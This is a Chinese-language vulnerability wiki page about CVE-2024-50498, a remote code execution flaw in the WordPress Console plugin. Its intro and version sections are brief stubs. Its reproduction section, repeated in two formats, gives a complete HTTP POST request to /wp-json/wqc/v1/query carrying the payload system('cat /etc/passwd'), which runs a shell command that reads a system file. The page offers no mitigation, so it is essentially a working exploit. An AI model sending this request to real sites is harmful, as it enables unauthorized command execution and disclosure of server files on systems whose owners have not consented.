fofamini-wiki

登录白背景

源码

Wordpress Console插件存在RCE漏洞(CVE-2024-50498)

一、漏洞简介

WordPress是一款免费开源的内容管理系统(CMS)，最初是一个博客平台，但后来发展成为一个功能强大的网站建设工具，适用于各种类型的网站，包括个人博客、企业网站、电子商务网站等，并逐步演化成一款内容管理系统软件。Wordpress Console插件存在RCE漏洞(CVE-2024-50498)

二、影响版本

Wordpress Console

三、资产测绘

特征

四、漏洞复现

POST /wp-json/wqc/v1/query HTTP/1.1
Host: 
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Priority: u=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 
{"queryArgs":"system('cat /etc/passwd')","queryType":"WP_Query"}

原文: https://www.yuque.com/xiaokp7/ocvun2/dqxy5zt3qfhz089t

# Wordpress Console插件存在RCE漏洞(CVE-2024-50498)

# 一、漏洞简介
WordPress是一款免费开源的内容管理系统(CMS)，最初是一个博客平台，但后来发展成为一个功能强大的网站建设工具，适用于各种类型的网站，包括个人博客、企业网站、电子商务网站等，并逐步演化成一款内容管理系统软件。Wordpress Console插件存在RCE漏洞(CVE-2024-50498)

# 二、影响版本
+ Wordpress Console

# 三、资产测绘
+ 特征

![1716814370160-8f81d79d-f2bf-4fad-b39d-cc0a6c8b7eec.png](./img/qfzBc4bOAzMPKb2j/1716814370160-8f81d79d-f2bf-4fad-b39d-cc0a6c8b7eec-986347.png)

# 四、漏洞复现
```plain
POST /wp-json/wqc/v1/query HTTP/1.1
Host: 
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Priority: u=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 
{"queryArgs":"system('cat /etc/passwd')","queryType":"WP_Query"}
```

![1733591230575-8f1915e1-0a7a-4f86-b3c9-b0cbad380e12.png](./img/qfzBc4bOAzMPKb2j/1733591230575-8f1915e1-0a7a-4f86-b3c9-b0cbad380e12-488569.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dqxy5zt3qfhz089t>

fofamini-wiki

Wordpress Console插件存在RCE漏洞(CVE-2024-50498)

<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>

<font style="color:rgb(38, 38, 38);">二、影响版本</font>

<font style="color:rgb(38, 38, 38);">三、资产测绘</font>

四、漏洞复现